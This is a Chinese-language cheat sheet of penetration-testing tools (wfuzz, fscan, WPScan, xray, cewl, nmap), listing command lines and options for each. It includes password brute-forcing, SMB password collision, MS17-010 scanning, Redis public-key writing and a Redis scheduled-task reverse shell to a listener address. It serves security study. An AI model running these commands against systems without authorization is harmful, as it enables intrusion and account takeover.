前言
記錄一下在學習中用過的一些工具,做個匯總,方便查看。
wfuzz
wfuzz是一個用python編寫的用來進行web模糊測試的工具。
爆破密碼
wfuzz -v -w pass.txt -d "username=admin&password=FUZZ" --hh 206 -u http://{target_ip}/login.php
目錄爆破
wfuzz -w php.txt -u http://192.168.247.142/FUZZ --hc 404
--hc 404 就是隱藏返回值404的頁面
同時FUZZ多個位置
wfuzz -c -z file,file1.txt -z file,file2.txt --sc 200 -u http://{target_ip}/FUZZ?FUZ2Z=1
fscan
fscan是一款內網綜合掃描工具,方便一鍵自動化、全方位漏掃掃描。
支持主機存活探測、端口掃描、常見服務的爆破、ms17010、redis批量寫公鑰、計划任務反彈shell、讀取win網卡信息、web指紋識別、web漏洞掃描、netbios探測、域控識別等功能。
基本用法
fscan.exe -h 192.168.1.1/24 (默認使用全部模塊)
fscan.exe -h 192.168.1.1/16 (B段掃描)
其他用法
fscan.exe -h 192.168.1.1/24 -np -no -nopoc(跳過存活檢測 、不保存文件、跳過web poc掃描)
fscan.exe -h 192.168.1.1/24 -rf id_rsa.pub (redis 寫公鑰)
fscan.exe -h 192.168.1.1/24 -rs 192.168.1.1:6666 (redis 計划任務反彈shell)
fscan.exe -h 192.168.1.1/24 -c whoami (ssh 爆破成功后,命令執行)
fscan.exe -h 192.168.1.1/24 -m ssh -p 2222 (指定模塊ssh和端口)
fscan.exe -h 192.168.1.1/24 -pwdf pwd.txt -userf users.txt (加載指定文件的用戶名、密碼來進行爆破)
fscan.exe -h 192.168.1.1/24 -o /tmp/1.txt (指定掃描結果保存路徑,默認保存在當前路徑)
fscan.exe -h 192.168.1.1/8 (A段的192.x.x.1和192.x.x.254,方便快速查看網段信息 )
fscan.exe -h 192.168.1.1/24 -m smb -pwd password (smb密碼碰撞)
fscan.exe -h 192.168.1.1/24 -m ms17010 (指定模塊)
fscan.exe -hf ip.txt (以文件導入)
fscan.exe -u http://baidu.com -proxy 8080 (掃描單個url,並設置http代理 http://127.0.0.1:8080)
fscan.exe -h 192.168.1.1/24 -nobr -nopoc (不進行爆破,不掃Web poc,以減少流量)
fscan.exe -h 192.168.1.1/24 -pa 3389 (在原基礎上,加入3389->rdp掃描)
完整參數
-c string
ssh命令執行
-cookie string
設置cookie
-debug int
多久沒響應,就打印當前進度(default 60)
-domain string
smb爆破模塊時,設置域名
-h string
目標ip: 192.168.11.11 | 192.168.11.11-255 | 192.168.11.11,192.168.11.12
-hf string
讀取文件中的目標
-hn string
掃描時,要跳過的ip: -hn 192.168.1.1/24
-m string
設置掃描模式: -m ssh (default "all")
-no
掃描結果不保存到文件中
-nobr
跳過sql、ftp、ssh等的密碼爆破
-nopoc
跳過web poc掃描
-np
跳過存活探測
-num int
web poc 發包速率 (default 20)
-o string
掃描結果保存到哪 (default "result.txt")
-p string
設置掃描的端口: 22 | 1-65535 | 22,80,3306 (default "21,22,80,81,135,139,443,445,1433,3306,5432,6379,7001,8000,8080,8089,9000,9200,11211,27017")
-pa string
新增需要掃描的端口,-pa 3389 (會在原有端口列表基礎上,新增該端口)
-path string
fcgi、smb romote file path
-ping
使用ping代替icmp進行存活探測
-pn string
掃描時要跳過的端口,as: -pn 445
-pocname string
指定web poc的模糊名字, -pocname weblogic
-proxy string
設置代理, -proxy http://127.0.0.1:8080
-user string
指定爆破時的用戶名
-userf string
指定爆破時的用戶名文件
-pwd string
指定爆破時的密碼
-pwdf string
指定爆破時的密碼文件
-rf string
指定redis寫公鑰用模塊的文件 (as: -rf id_rsa.pub)
-rs string
redis計划任務反彈shell的ip端口 (as: -rs 192.168.1.1:6666)
-silent
靜默掃描,適合cs掃描時不回顯
-sshkey string
ssh連接時,指定ssh私鑰
-t int
掃描線程 (default 600)
-time int
端口掃描超時時間 (default 3)
-u string
指定Url掃描
-uf string
指定Url文件掃描
-wt int
web訪問超時時間 (default 5)
WPscan
kali自帶的word press掃描工具
掃描漏洞:
wpscan --url http://{site}/
添加參數
--api-token可以看到更詳細的漏洞信息。
掃描用戶
wpscan --url http://{site}/ --enumerate u
掃描主題
wpscan --url http://{site}/ --enumerate t
掃描主題中的漏洞
wpscan --url http://{site}/ --enumerate vt
掃描插件和插件中的漏洞
wpscan --url http://{site}/ --enumerate p
wpscan --url http://{site}/ --enumerate vp
密碼爆破
wpscan --url https://{site}/ -e u --passwords passwords.txt
xray
xray是一款功能強大的安全評估工具
主動掃描
使用基礎爬蟲爬取目標並進行掃描。
xray webscan --basic-crawler http://example.com --html-output xxx.html
使用瀏覽器爬蟲爬取目標並進行掃描。
xray webscan --browser-crawler http://example.com --html-output xxx.html
掃描單個url
xray webscan --url http://example.com/ --html-output single-url.html
被動代理
1、生成證書
./xray genca
2、將證書導入瀏覽器
先導入證書,后配置代理。
不同瀏覽器方法不一樣,參考文檔。
3、啟動代理
xray webscan --listen 127.0.0.1:7777 --html-output xxx.html
cewl
cewl是一個 ruby 應用,爬行指定url的指定深度。也可以跟一個外部鏈接,結果會返回一個單詞列表,這個列表可以扔到John the ripper工具里進行密碼破解。cewl還有一個相關的命令行 工具 應用FAB,它使用相同的元數據提取技術從已下載的列表中創建作者/創建者列表。
使用幫助
cewl -h
默認方法
輸入下列命令之后,爬蟲會根據指定的URL和深度進行爬取,然后打印出可用於密碼破解的字典:
cewl http://www.ignitetechnologies.in/
保存字典文件
為了方便記錄,或者為將來的研究提供參考,Cewl可以將打印出的字典存儲為文件。這里可以使用-w參數來將密碼字典存儲為text文件:
cewl http://www.ignitetechnologies.in/ -w dict.txt
可以使用下列命令查看密碼字典是否存儲成功,我們的存儲路徑為/root /dict.txt:
cat dict.txt
生成特定長度的字典
如果你想生成指定長度的密碼字典,你可以使用-m選項來設置:
cewl http://www.ignitetechnologies.in/ -m 9
上述命令將生成長度至少為9位的密碼
從網站中獲取Email
你可以使用-e選項來啟用Email參數,並配合-n選項來隱藏工具在爬取網站過程中生成的密碼字典:
cewl http://www.ignitetechnologies.in/ -n -e
計算網站字典中重復的單詞數量:
如果你想要計算目標網站中某個詞的重復出現次數,你可以使用-c選項來開啟參數計算功能:
cewl http://www.ignitetechnologies.in/ -c
提取調試信息
你可以使用--debug選項來開啟調試模式,這樣就可以查看網站爬取過程中出現的錯誤和元數據了:
cewl http://www.ignitetechnologies.in/ --debug
Verbose模式
為了擴展網站爬取結果,並獲取更加完整的數據報告,你可以使用-v選項來進入verbose模式。該模式下,Cewl會導出目標網站的詳細數據:
cewl http://www.ignitetechnologies.in/ -v
生成包含數字和字符的字典
如果你想生成包含數字和字符的字典文件,你可以在命令中使用–with-numbers選項:
cewl http://testphp.vulnweb.com/ --with-numbers
Cewl摘要/基礎認證
如果目標網站需要進行頁面登錄認證的話,我們就要使用下列參數來繞過頁面認證的限制:
–auth_type: Digest or basic.
–auth_user: Authentication username.
–auth_pass: Authentication password.
cewl http://192.168.1.105/dvwa/login.php --auth_type Digest --auth_user admin--auth_pass password -v
或者
cewl http://192.168.1.105/dvwa/login.php --auth_type basic --auth_user admin--auth_pass password -v
代理URL
如果目標網站設置了代理服務器的話,Cewl將無法使用默認命令來生成字典。此時你需要使用–proxy option選項來啟用代理URL功能:
cewl --proxy_host 192.168.1.103 --proxy_port 3128 -w dict.txt http://192.168.1.103/wordpress/
nmap
Nmap(“網絡映射器”)是用於網絡發現和安全審計的免費開源實用程序。許多系統和網絡管理員還發現,它對於網絡資源清冊、管理服務升級計划以及監控主機或服務正常運行時間等任務非常有用。Nmap以新穎的方式使用原始IP數據包來確定網絡上有哪些主機、這些主機提供哪些服務(應用程序名稱和版本)、它們正在運行哪些操作系統(和操作系統版本)、使用何種類型的數據包過濾器/防火牆,以及數十個其他特性。它被設計用於快速掃描大型網絡,但在單台主機上運行良好。Nmap運行在所有主要的計算機操作系統上,Linux、Windows和Mac OS X都可以使用官方二進制軟件包。除了經典的命令行Nmap可執行文件外,Nmap套件還包括一個高級GUI和結果查看器(Zenmap),一個靈活的數據傳輸、重定向和調試工具(Ncat),用於比較掃描結果的實用程序(Ndiff)和數據包生成和響應分析工具(Nping)。
簡單掃描(默認會掃tcp 前1000端口)
nmap 192.168.16.100
端口掃描
指定端口:
nmap 192.168.16.100 -p 80(單個端口)
nmap 192.168.16.100 -p 1-100(多個端口)
nmap 192.168.16.100 -p- (所有端口)
TCP全連接掃描:
nmap -sT 192.168.16.100 -p 80
優點:准確
缺點:速度慢,會留下大量、密集的日志記錄
SYN半連接掃描:
nmap -sS 192.168.16.100 -p 80
優點:速度很快
缺點:就是不准並且需要root權限
目標主機版本(不是很准確)
nmap -O 192.168.16.100 -p 80
服務版本
nmap -O -sV 192.168.16.100 -p 80
全面掃描
nmap -A 192.168.16.100 -p-
保持結果
nmap -A 192.168.16.100 -p- -oN nmap1
路由追蹤
nmap --traceroute 127.0.0.1
nmap設置掃描一個網段下的ip
nmap -sP 127.0.0.1 /24
掃描目標主機版本(不是很准確)
nmap -O 127.0.0.1 -p 80
掃描目標服務版本
nmap -O -sV 127.0.0.1 -p 80
全面掃描(包含了1-10000端口ping掃描,操作系統掃描,腳本掃描,路由跟蹤,服務探測)
nmap -A 127.0.0.1 -p-
保存結果
nmap -A 127.0.0.1 -p- -oN nmap1
nmap命令混合式掃描
nmap -vv -p1-100 -o 127.0.0.1
掃描多個目標
nmap 127.0.0.1 127.0.0.2
掃描IP地址為127.0.0.1-127.0.0.100內的所有主機
nmap 127.0.0.1-100
namp在同一目錄下,掃描這個txt內的所有主機
nmap -iL target.txt
注:使用時請將127.0.0.1更換為目標IP地址
nmap探測活躍主機
同網段優先使用arp探測:
當啟動Namp主機活躍掃描時候,Nmap會對目標地址參數進行檢查,如果與自身IP地址匹配到同一個子網內,Nmap會對該類目標采用arp協議進行探測。即使命令參數規定的是其他探測手段,也會先使用arp進行探測。這種方式效率高,速度快,但僅限於同一子網廣播域中。
1 nmap -R 192.168.1.1
2 nmap -R 192.168.1.0/24
3 nmap 192.168.1.1
4 nmap 192.168.1.0/24
跨網段ICMP協議探測:
ICMP探測一ICMP echo:
常規PING探測,原理即為ping命令一樣,但由於ping命令的濫用導致FW或者很多OS都會閑置ping包。特點:速度快,但探測不准確。
nmap -sP 114.114.114.114
ICMP探測二ICMP timestamp:
nmap發送ICMP timestamp報文,活躍主機會響應該報文,響應報文中包含當前系統時間。
nmap -PP 114.114.115.115
TCP探測:
如同常見的端口掃描原理,syn類的,ack類的,fin類的,空掃描等等。通過回應報文判斷主機是否活躍。
1 nmap -sT 114.114.114.114 #TCP connect scan[three hand-shakes]
2 nmap -sS 114.114.114.114 #TCP SYN scan[syn->recv ack]
3 nmap -sA 114.114.114.114 #TCP ACK scan
4 nmap -sW 114.114.114.114 #TCP Window scan
5 nmap -sM 114.114.114.114 #TCP Maimon scan
6 nmap -sN 114.114.114.114 # TCP Null scan
7 nmap -sF 114.114.114.114 #TCP FIN scan
UDP探測:
UDP探測原理是根據活躍主機對未開放的端口會響應一個ICMP不可達報文來判斷的。
1 nmap -PU 114.114.114.114#默認發送空UDP報文到40125端口
2 nmap -sU 114.114.114.114 -p 44444 #-p 指定端口
3 nmap -sU 114.114.114.114 -p 53 -Pn #-Pn 繞過ping掃描
IP 探測:
發送空的也可以指定負載大小的IP報文,可能收到響應報文為ICMP不可達報文。
1 nmap -sO 114.114.114.114
2 nmap -PO 114.114.114.114